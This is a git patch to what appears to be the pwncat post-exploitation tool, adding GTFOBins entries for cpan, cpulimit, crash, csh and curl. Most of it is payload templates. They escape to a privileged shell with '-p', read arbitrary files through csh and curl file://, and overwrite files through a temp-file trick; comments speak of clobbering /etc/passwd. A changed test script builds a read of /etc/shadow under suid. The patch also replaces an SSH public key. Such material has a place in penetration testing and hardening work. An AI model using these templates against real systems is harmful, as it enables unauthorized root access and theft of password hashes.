From bc774eb7e005afb2008c4e351d576a1e186d84fb Mon Sep 17 00:00:00 2001
From: John Hammond <johnhammond010@gmail.com>
Date: Thu, 14 May 2020 22:20:38 -0400
Subject: [PATCH] Added new GTFOBins for curl and csh

---
 data/gtfobins.json | 134 +++++++++++++++++++++++++++++++++++++++++----
 data/pwncat.pub    |   2 +-
 gtfobinstest.py    |  10 ++--
 3 files changed, 131 insertions(+), 15 deletions(-)

diff --git a/data/gtfobins.json b/data/gtfobins.json
index a6e047d..b36eb5e 100644
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@@ -86,7 +86,7 @@
 		},
 		{
 			"type": "read",
-			"stream": "print",
+			"stream": "raw",
 			"payload": "{command}",
 			"args": ["-c", "'{cat} {lfile}'"],
 			"suid": ["-p"]
@@ -364,15 +364,129 @@
 			"exit": "exit\n"
 		}
 
-		// Could we do some file_read and file_write with this too..?
+		// Could we do some file_read and file_write with this too..? We can run cobol...
 	],
 //-------------------------------------------------------------------
-	// "cpan": [
-	// 	{
-	// 		"type": "shell",
-	// 		"payload": "{command}",
-	// 		"input" : "! exec {shell} -p\n",
-	// 		"exit": "exit\n"
-	// 	}
-	// ]
+	"cpan": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"input" : "! system(\"{shell} -p\")\n",
+			// exit the shell, AND exit cpan
+			"exit": "exit\nexit\n"
+		}
+
+		// Could we do some file_read and file_write with this too? We can run perl...
+	],
+//-------------------------------------------------------------------
+	"cpulimit": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"args": ["-l", "100", "-f", "\"{shell}\""],
+			// exit the shell, AND exit cpan
+			"exit": "exit\n"
+		}
+		// We cannot seem to pass other arguments to process ran, so no read/write (???)
+	],
+//-------------------------------------------------------------------
+	"crash": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"args": ["-h"],
+			"input": "!{shell} -p\n",
+			// exit the shell, AND exit cpan
+			"exit": "exit\nq\n"
+		}
+		// We cannot seem to pass other arguments to process ran, so no read/write (???)
+	],
+//-------------------------------------------------------------------
+	"csh": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"suid": ["-b"],
+			"input": "{shell} -p\n",
+			// exit the shell, AND exit csh
+			"exit": "exit\nexit\n"
+		},
+		{
+			"type": "read",
+			"stream": "print",
+			"payload": "{command}",
+			// "suid" is not supplied because it must be very last argument
+			"args": ["-c", "\"{cat} {lfile}\"", "-b"]
+		}
+		// Using write, it doesn't get the entire text to clobber /etc/passwd
+		// {
+		// 	"type": "write",
+		// 	"stream": "base64",
+		// 	"payload": "{command}",
+		// 	"args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
+		// 	// "suid" is not supplied because it must be very last argument
+		// 	"exit": "{ctrl_d}"
+		// }
+	],
+	"bsd-csh": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"input": "{shell} -p\n",
+			"suid": ["-b"],
+			// exit the shell, AND exit csh
+			"exit": "exit\nexit\n"
+		},
+		{
+			"type": "read",
+			"stream": "print",
+			"payload": "{command}",
+			// "suid" is not supplied because it must be very last argument
+			"args": ["-c", "\"{cat} {lfile}\"", "-b"]
+		}
+		// Using write, it doesn't get the entire text to clobber /etc/passwd
+		// {
+		// 	"type": "write",
+		// 	"stream": "base64",
+		// 	"payload": "{command}",
+		// 	"args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
+		// 	// "suid" is not supplied because it must be very last argument
+		// 	"exit": "{ctrl_d}"
+		// }
+	],
+//-------------------------------------------------------------------
+	"curl": [
+		{
+			"type": "read",
+			"stream": "raw",
+			"payload": "{command}",
+			"args": ["-s", "file://{lfile} --output -"]
+		},
+		{
+			"type": "read",
+			"stream": "base64",
+			"payload": "{command}",
+			"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
+		},
+		{
+			"type": "write",
+			"stream": "print",
+			// This is weird because under the case where we are running w/ sudo,
+			// we need to ask for the password first. The first "{command}" will
+			// ask for the sudo password, then fail. The second "{command}"
+			// will not ask for the sudo password, and then the copy will succeed.
+			// Without sudo, the first command will simply fail, and the second
+			// will succeed. This is the same for the other payload below.
+			"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
+			"args": ["-s", "file://$TF --output {lfile}"],
+			"exit": "{ctrl_d}"
+		},
+		{
+			"type": "write",
+			"stream": "base64",
+			"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
+			"args": ["-s", "file://$TF --output {lfile}"],
+			"exit": "{ctrl_d}"
+		}
+	]
 }
\ No newline at end of file
diff --git a/data/pwncat.pub b/data/pwncat.pub
index 0a23efe..9479174 100644
--- a/data/pwncat.pub
+++ b/data/pwncat.pub
@@ -1 +1 @@
-ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= caleb@stewie-xps
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= pwncat@pwncat
diff --git a/gtfobinstest.py b/gtfobinstest.py
index e2d8cfc..24f1441 100644
--- a/gtfobinstest.py
+++ b/gtfobinstest.py
@@ -17,8 +17,10 @@ def which(path: str, quote=False):
 gtfo = GTFOBins("data/gtfobins.json", which)
 
 
-binary_to_test = "cpan"
-capabilities_to_test = Capability.SHELL
+binary_to_test = "curl"
+# capabilities_to_test = Capability.SHELL
+capabilities_to_test = Capability.WRITE
+# capabilities_to_test = Capability.WRITE
 our_shell = "/bin/bash"
 
 binary = gtfo.find_binary(binary_to_test)
@@ -30,8 +32,8 @@ methods = binary.iter_methods(
 )
 for method in methods:
     # print(method)
-    print(method.build(shell=our_shell)[0])
-    # print(method.build(lfile="/etc/shadow")[0])
+    # print(method.build(shell=our_shell, suid=True))
+    print(method.build(lfile="/etc/shadow", suid=True)[0])
     # print(method.build(lfile="/tmp/test", data="hello")[0])
 
 # all_binaries = list(gtfo.iter_methods(Capability.SHELL))